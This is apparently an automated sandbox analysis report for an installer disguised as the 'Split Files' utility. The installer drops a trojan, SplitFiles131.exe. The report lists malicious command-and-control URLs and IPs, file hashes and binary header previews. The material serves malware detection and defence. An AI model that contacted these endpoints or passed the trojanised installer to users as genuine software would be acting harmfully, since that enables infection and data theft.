                http://www.innosetup.com/is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drfalse
                • URL Reputation: safe
                		unknown
                http://107.182.129.235/storage/extension.phpuSplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://107.182.129.235/storage/extension.php2SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://107.182.129.235/storage/extension.phprSplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpfalse
                • 16%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://171.22.30.106/uSplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.remobjects.com/?psfile.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drfalse
                • URL Reputation: safe
                		unknown
                http://107.182.129.235/storage/extension.phpC&SplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://107.182.129.235ibrary.phpSplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                • URL Reputation: safe
                		unknown
                http://171.22.30.106/library.phpTSplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmptrue
                • 9%, Virustotal, Browse
                • Avira URL Cloud: malware
                		unknown
                http://www.innosetup.comDVarFileInfo$file.exe, 00000000.00000003.249290650.00000000023A9000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249555772.00000000021CD000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339420924.00000000004C4000.00000002.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drfalse
                • Avira URL Cloud: safe
                		low
                http://107.182.129.235/storage/ping.phpSSplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://171.22.30.106/SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmptrue
                • URL Reputation: malware
                		unknown
                http://107.182.129.235/storage/extension.phpOSplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000002.338008683.0000000001823000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://www.altarsoft.com/split_files.shtmlis-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-7HLEL.tmp.1.dr, is-B5MB3.tmp.1.dr, is-E35J6.tmp.1.dr, is-AFEG0.tmp.1.dr, is-CSEUG.tmp.1.dr, is-OOV97.tmp.1.dr, is-7R5M5.tmp.1.dr, is-2PF6K.tmp.1.dr, is-FNEKR.tmp.1.dr, is-7QVA3.tmp.1.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://107.182.129.235/SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: safe
                		unknown
                http://45.139.105.171/SplitFiles131.exe, 00000002.00000003.326951198.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303368404.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308803603.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292577941.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314175425.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.297984952.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287127148.0000000001828000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274823658.0000000001826000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320373559.0000000001828000.00000004.00000020.00020000.00000000.sdmpfalse
                • URL Reputation: safe
                		unknown
                http://rus.altarsoft.com/split_files.shtmlis-6A80U.tmp, 00000001.00000002.340287748.0000000004D00000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339273052.000000000018F000.00000004.00000010.00020000.00000000.sdmp, is-61K5M.tmp.1.dr, is-3OLEK.tmp.1.drfalse
                • Avira URL Cloud: safe
                		unknown
                http://171.22.30.106/nSplitFiles131.exe, 00000002.00000003.326963986.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.320504531.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.314196662.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.303390876.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.308818308.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.298000415.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.292594501.0000000001839000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://www.innosetup.comfile.exefalse
                • URL Reputation: safe
                		unknown
                http://171.22.30.106/library.php4SplitFiles131.exe, 00000002.00000002.337974221.0000000001802000.00000004.00000020.00020000.00000000.sdmptrue
                • Avira URL Cloud: malware
                		unknown
                http://107.182.129.235/storage/extension.phpzSplitFiles131.exe, 00000002.00000003.287148739.0000000001839000.00000004.00000020.00020000.00000000.sdmp, SplitFiles131.exe, 00000002.00000003.274854378.0000000001839000.00000004.00000020.00020000.00000000.sdmpfalse
                • Avira URL Cloud: malware
                		unknown
                http://www.remobjects.com/?psUfile.exe, 00000000.00000003.249157773.0000000002300000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.249345408.0000000002128000.00000004.00001000.00020000.00000000.sdmp, is-6A80U.tmp, 00000001.00000002.339309119.0000000000401000.00000020.00000001.01000000.00000004.sdmp, is-HBEMJ.tmp.1.dr, is-6A80U.tmp.0.drfalse
                • URL Reputation: safe
                		unknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                45.139.105.171
                		unknownItaly
                		33657CMCSUStrue
                45.139.105.1
                		unknownItaly
                		33657CMCSUStrue
                85.31.46.167
                		unknownGermany
                		43659CLOUDCOMPUTINGDEtrue
                107.182.129.235
                		unknownReserved
                		11070META-ASUStrue
                171.22.30.106
                		unknownGermany
                		33657CMCSUStrue

                General Information

                Joe Sandbox Version:36.0.0 Rainbow Opal
                Analysis ID:778228
                Start date and time:2023-01-05 08:55:04 +01:00
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 8m 42s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:file.exe
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                Run name:Run with higher sleep bypass
                Number of analysed new started processes analysed:20
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal100.troj.evad.winEXE@12/39@0/5
                EGA Information:
                • Successful, ratio: 100%
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 95%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Sleeps bigger than 100000000ms are automatically reduced to 1000ms

                Warnings

                • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, WMIADAP.exe, SgrmBroker.exe, conhost.exe, backgroundTaskHost.exe, svchost.exe
                • TCP Packets have been reduced to 100
                • Excluded domains from analysis (whitelisted): fs.microsoft.com
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtOpenKeyEx calls found.
                • Report size getting too big, too many NtProtectVirtualMemory calls found.
                • Report size getting too big, too many NtQueryValueKey calls found.

                Simulations

                Behavior and APIs

                No simulations

                Joe Sandbox View / Context

                IPs

                No context

                Domains

                No context

                ASNs

                No context

                JA3 Fingerprints

                No context

                Dropped Files

                No context

                Created / dropped Files

                C:\Program Files (x86)\Split Files\ReadMe - EN.txt (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Reputation:moderate, very likely benign file
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..

                C:\Program Files (x86)\Split Files\ReadMe - RU.txt (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..

                C:\Program Files (x86)\Split Files\SplitFiles131.exe

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                Category:modified
                Size (bytes):3491315
                Entropy (8bit):5.600225128146387
                Encrypted:false
                SSDEEP:24576:8kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:8VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                MD5:361518D6CC3C25EEC2DFC1DE82B055B2
                SHA1:5B298ED47BDEFA0BB953F277649CCB7C3A308C3C
                SHA-256:616BB3AC1AE4651819FCD80CB8357940061AF64A21401C33E8C84CFF41679211
                SHA-512:4EFAC7D2D772FDD8D3DAC80CE7874D5E85957D39B8F1392E00CF8969F87076A1146363990212ED79E63ADEF92427514E3E7D957B2E3E3D056E5A6741D57FA030
                Malicious:true
                Antivirus:
                • Antivirus: Joe Sandbox ML, Detection: 100%
                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\Split Files\is-61K5M.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with very long lines (1053), with CRLF line terminators
                Category:dropped
                Size (bytes):2942
                Entropy (8bit):5.0506474169868945
                Encrypted:false
                SSDEEP:48:mRIjSLoZpLobGyYly6y4cMUNYzLEDa3dMSsXNBIi3Dl0r4k1z9bcX4Xl9asUvn6d:IW7Lob1YEgcMiDa3WN7BW1zLV1mngV4+
                MD5:58D65074A58BC8EAE2D5A3B589399A53
                SHA1:074E7E5BFD52200086309913670D49BA664FB279
                SHA-256:2F2487EDEEEA0D35394FD1C0B72D9C1FBF617DD014ED659083BDB0EFB12F6C90
                SHA-512:C0806DFC9DCD2A620693115679057B5374DEA3930E02F2B8DD1390C843D3F7C138CA8576CA35A5BCBEEA68E5CD9F5193C8D564A942C5A179DB9C5E6CAAA00266
                Malicious:false
                Preview:Split Files 1.72..............:....1. ...........2. ..........3. .............-----------------------------------------------------------------....1. ...................... ............. ... .......... ...... .. ..... ...... ..... . ............ .. .......... . ........ ..... ..... ..... ... ............ ... ........ ...... .. ......, ....... ........... ..... ........... ....... ... ........ .......... ....... ........ .... . .......... ... ..... ........... ..... ...... ........ ... ........ ..........: .. ..... ......, .. ....... ...... ...... ..... ..... ......... . ......, .........., .........., ........... ..... ....... .bat .... ... .......... ...... ... .......... ... ..... .......... ......... .bat .... . ..... ... ......... ..... ...... ... ............. . .bat ..... ........ ..... ........ ...... ..... ........ ...... ......... ...... ..... ..... ..... ..... ....., ........... zip ........... ... ...... ..... .......... ....... ...... ....., ....... ........ ........... ..

                C:\Program Files (x86)\Split Files\is-7HLEL.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2193
                Entropy (8bit):4.702648325021821
                Encrypted:false
                SSDEEP:24:ElZ5/fnS3LWjwbf2VQZl5HXvbap4qDwGApRAboaGnMAzPelJoEhLifJy:mZ3jwbf2V25HjcwGpbpGMaelXh2g
                MD5:EA42A2F0D0B4CBE042DE38568E18F1AC
                SHA1:58B2B523D4CCB03A07F9B1CB53250F3C6BA0B771
                SHA-256:AF9B99F745D2B2F3E688336C68F69C9CADF7E85BF443100DDA4EBB507D86155A
                SHA-512:6F202138BE4B009152A72AB671A4C5D3AE5580211EDE11F4E35B89F2F1EF58E8B8DBD35E9DA1D12B7ABDD3BFD4EE342541DE8DE2437D0FCEA77A1C5782AE0E2A
                Malicious:false
                Preview:Split Files 1.72....Contents:....1. Description...2. History...3. Localization...4. Contacts.....-----------------------------------------------------------------....1. Description.....Fast and easy file splitter and joiner...Split files by parts size or parts number...Create .bat file to merge parts without program.....-----------------------------------------------------------------....2. Development History:....17.10.2010 - update to version 1.72....- large files splitting error fix (over 2 Gb)..- new language: turkish....9.02.2010 - update to version 1.71....- split and join options in windows explorer pop-up menu....16.01.2010 - update to version 1.7....- new languages: dutch, italian, spanish..- delete input file after splitting....3.01.2010 - update to version 1.6....- compression (zip)..- drag and drop..- french language..- arabic language..- interface was changed....18.11.2008 - update to version 1.5....- large files splitting error fix (over 1 Gb)..- output folder selection..

                C:\Program Files (x86)\Split Files\is-E35J6.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:MS Windows 95 Internet shortcut text (URL=<http://www.altarsoft.com/split_files.shtml>), ASCII text, with CRLF line terminators
                Category:dropped
                Size (bytes):97
                Entropy (8bit):5.12302231676258
                Encrypted:false
                SSDEEP:3:HRAbABGQYm/0S4UEtSNM5LTJOBCBuQpQQXXy:HRYFVm/r4UEtSeVTJuZQplHy
                MD5:DCD6923B008121BFF4C7C0AA1206286E
                SHA1:AD4EF16A96A80C8EA5DBC5933229580BC6C332E0
                SHA-256:E1E01BFA5E2B5A117A627F7E9E861CF63D852A66BCE0DF88094D59CAF61E4376
                SHA-512:EC4A399EB38A1FA64DF8990708168F134ACD0CA793930E57C6D3A260A537B20DFD9F8B7232987F32EC1C1A7CEC7EC91F15A644A63D275104D96588FC3D354B5C
                Malicious:false
                Preview:[InternetShortcut]..URL=http://www.altarsoft.com/split_files.shtml..Modified=500425EA770BCC01B2..

                C:\Program Files (x86)\Split Files\is-HBEMJ.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                Category:dropped
                Size (bytes):789258
                Entropy (8bit):6.369988626022893
                Encrypted:false
                SSDEEP:12288:EpmOmg1k2bfrP437QzH/A6A40lG77NzknuGyJOxOU:emt2bfrP437QzH/A6A7E7dVPUxOU
                MD5:D3BA43B9E1B3838F28AFC558F2991D5B
                SHA1:1132F1C76760281A591F7DF99D592283103FCC87
                SHA-256:1E95FE5D06884DF82D2BEAEDA09434ECAC2A347AEC5F03E71F20E39FB6C9E0E9
                SHA-512:870371843F59B91D75B6C4D4C637075235D25CF3ABB059B58E39F9CD2833533A8F434307E7AD1175FD45082D3B4E4F0ED79F303ED77DEF553587E2819C092022
                Malicious:true
                Preview:MZP.....................@.......................InUn....................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................4......X.............@..............................................@...............................%......l....................@...............................0......................................................CODE....l........................... ..`DATA................................@...BSS.....p................................idata...%.......&..................@....tls......... ...........................rdata.......0......................@..P.reloc..t....@......................@..P.rsrc...l...........................@..P....................................@..P........................................................................................................................................

                C:\Program Files (x86)\Split Files\is-S95ML.tmp

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:data
                Category:dropped
                Size (bytes):3491315
                Entropy (8bit):5.600224518949536
                Encrypted:false
                SSDEEP:24576:3kvs+hjRbEtvgIyhbpegN4X94JFlWchs9F4AyM1n6iuAdsGR0A2O3DyLaYtBlecd:3VQj5EtvSpZvJFIp9IM1ft22mHBldXXL
                MD5:F488A4815DE52F915E37E40EA88B011F
                SHA1:16F9954F5E9FE6CB50125396B7DB524218D01237
                SHA-256:E13C9E749995269A3C45C6464B2F0BF55283288FD020FE4D0F1CA811142CC2AC
                SHA-512:04262ADC77B3126FCB9A8991612DDCFC35DF7F35988D108079A0BACF04350C57E829CA8E8C74833D0A0D9D9CD1DD480B9F4FA7145051AECF85D23C85A90667E2
                Malicious:false
                Preview:.Z......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....~.c.........._...............................@..........................P......]m5..............................................P...e...........................................................................................................text...2........................... ..`.rdata...+.......0..................@..@.data........0.......0..............@....tls.... ....@.......@..............@....rsrc....p...P...p...P..............@..@.ave131...+......+.................`.*.................................................................................................................................................................................................................................................................................................................................................................................................

                C:\Program Files (x86)\Split Files\language\Arabic.ini (copy)

                Download File
                Process:C:\Users\user\AppData\Local\Temp\is-DTM8E.tmp\is-6A80U.tmp
                File Type:ISO-8859 text, with CRLF line terminators
                Category:dropped
                Size (bytes):2266
                Entropy (8bit):5.4593359267896355
                Encrypted:false
                SSDEEP:48:HG8il+sqirh7zJ9YTHskp1r4phFAqLNnK9h:HGkSkp1r4NTKf
